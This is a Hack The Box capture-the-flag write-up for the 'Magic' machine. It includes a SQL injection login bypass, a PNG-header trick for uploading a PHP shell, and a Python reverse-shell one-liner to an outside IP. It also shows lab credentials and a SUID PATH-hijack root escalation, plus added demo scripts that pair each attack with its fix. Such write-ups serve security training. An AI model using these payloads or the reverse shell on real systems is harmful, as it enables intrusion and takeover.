Magic was a medium difficulty machine on Hack The Box. Here's my take on solving it.

TL;DR: SQL injection in the login form allows an authentication bypass and grants access to an image upload feature. The feature's filter can be bypassed by uploading a PHP file prepended with the PNG file header, giving code execution and a reverse shell. Locally it's possible to dump the database using credentials found in a PHP file. The database contains a password that allows logging in as the theseus user and grabbing the user flag. Privilege escalation is possible through a vulnerable SUID sysinfo program, which calls fdisk with root privileges. By manipulating the PATH variable it's possible to execute arbitrary code and gain root privileges.

User

Nmap shows practically only one attack surface, the web server:

The main site contains a gallery of some random images and a link to a login page:

The login page can be bypassed with the world's oldest SQL injection in the username field:

admin' OR 'a'='a
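The following is an added example, not part of the original writeup, showing why the payload above works and what the fix looks like. It builds a constructed stand-in for the box's `login` table in an in-memory sqlite3 database (an assumption; the box runs MySQL, but the string quoting the injection abuses behaves the same way) and runs the same lookup once with string concatenation and once with a parameterised query.

```python
import sqlite3

# Constructed stand-in for the box's MySQL `login` table (assumption:
# sqlite3 is used here instead of MySQL; the string quoting the injection
# exploits works the same way in both).
ROWS = [(1, "admin", "Th3s3usW4sK1ng")]

PAYLOAD = "admin' OR 'a'='a"


def _connect():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO login VALUES (?, ?, ?)", ROWS)
    return conn


def render_vulnerable_query(username, password):
    """Build the query by string concatenation, the pattern the bypass relies on."""
    return ("SELECT username FROM login WHERE username='%s' AND password='%s'"
            % (username, password))


def vulnerable_login(username, password):
    """Returns the matched username, or None. With PAYLOAD as the username the
    WHERE clause becomes  username='admin' OR 'a'='a' AND password='...'.
    AND binds tighter than OR, so it reads  username='admin' OR (...)  and is
    true for the admin row whatever the password is. Note this only works
    because a user called admin exists; see the test with a bogus user."""
    row = _connect().execute(render_vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def safe_login(username, password):
    """Parameterised query: the input is bound as data and never parsed as SQL."""
    row = _connect().execute(
        "SELECT username FROM login WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    print(render_vulnerable_query(PAYLOAD, "wrong"))
    print(vulnerable_login(PAYLOAD, "wrong"))   # admin: bypassed
    print(safe_login(PAYLOAD, "wrong"))         # None: rejected
```

The precedence detail matters in practice: injecting into the username only bypasses the check for an account name that actually exists, whereas the same `' OR 'a'='a` placed in the password field turns the whole clause true for every row.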

It gives access to a file upload form:

The application filters uploaded images both by extension and by content. The first filter can be bypassed by creating a file with a PHP reverse shell and a "double extension", named for example tellico.php.png.

The file above will still be rejected because its content does not look like a PNG. That can be fixed by prepending the 8-byte PNG signature to the PHP code:

0x89  0x50  0x4e  0x47  0x0d  0x0a  0x1a  0x0a

Now the file uploads, but that's not the end of the problems. The standard netcat shell didn't work (netcat is missing from the box), so I uploaded a simple webshell to try and develop something that would work:

As it turns out, there's a Python interpreter installed, but it's only available under the name python3. With that knowledge, the command:

python3 -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.38',443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);"

should return a shell:

In the /var/www/Magic folder there's a db.php5 file that contains database credentials:

$ cat db.php5
<?php
class Database
{
private static $dbName = 'Magic' ;
private static $dbHost = 'localhost' ;
private static $dbUsername = 'theseus';
private static $dbUserPassword = 'iamkingtheseus';
-- snip --

Using them it's possible to dump the database and learn another password:

mysqldump -u theseus -p --all-databases
-- snip --
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
-- snip --

This password also works for the theseus Linux user and gives access to the user flag:

Root

There's a SUID sysinfo program installed on the machine. It is vulnerable to a known local privilege escalation: during its run it calls the external fdisk program by name, so it is resolved through PATH. By adding a writable directory to PATH and creating a fake fdisk executable there, it's possible to run arbitrary code with root privileges. I used it to run my reverse shell code once again:

After running sysinfo there should be a reverse shell with root privileges:
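As an added example (not part of the original writeup), the script below reproduces the PATH hijack offline. It plants a constructed fake fdisk that only prints a marker instead of spawning a reverse shell, prepends its directory to PATH, and runs a model of the vulnerable call; the model assumes sysinfo invokes `fdisk` by bare name through the shell and inherits the caller's PATH. The same call with PATH pinned to a fixed system value shows the fix.

```python
import os
import shutil
import subprocess
import tempfile

# Constructed fake fdisk. In the real attack this is where the reverse shell
# command goes; here it only prints a marker so the hijack is observable offline.
FAKE_FDISK = "#!/bin/sh\necho HIJACKED\n"

# What a hardened SUID program would use instead of inheriting the caller's PATH
# (or it would call /sbin/fdisk by absolute path).
SAFE_PATH = "/usr/sbin:/sbin:/usr/bin:/bin"


def plant_fake_fdisk(directory: str) -> str:
    """Drop an executable named fdisk into a directory we control."""
    path = os.path.join(directory, "fdisk")
    with open(path, "w") as f:
        f.write(FAKE_FDISK)
    os.chmod(path, 0o755)
    return path


def run_fdisk_like_sysinfo(path_env: str) -> str:
    """Model of the vulnerable call (assumption about how sysinfo invokes it):
    fdisk is run by bare name through the shell, so it is resolved against
    whatever PATH the process was given. Returns the command's stdout."""
    result = subprocess.run(
        "fdisk -l 2>/dev/null",
        shell=True,
        capture_output=True,
        text=True,
        env={"PATH": path_env},
    )
    return result.stdout.strip()


def hijack(writable_dir: str) -> tuple:
    """Prepend the writable directory to PATH and run the model call.
    Returns (path that 'fdisk' now resolves to, output of the call)."""
    plant_fake_fdisk(writable_dir)
    attacker_path = writable_dir + os.pathsep + os.environ.get("PATH", SAFE_PATH)
    resolved = shutil.which("fdisk", path=attacker_path)
    return resolved, run_fdisk_like_sysinfo(attacker_path)


def demo() -> tuple:
    """Returns (resolved fdisk path, hijacked output, output with PATH pinned)."""
    with tempfile.TemporaryDirectory() as tmp:
        resolved, hijacked = hijack(tmp)
        pinned = run_fdisk_like_sysinfo(SAFE_PATH)
    return resolved, hijacked, pinned


if __name__ == "__main__":
    print(demo())
```

On the box the same idea is typed as: write the reverse shell command into `/tmp/fdisk`, `chmod +x` it, `export PATH=/tmp:$PATH`, then run sysinfo. Because the binary is SUID root, the fake fdisk runs as root.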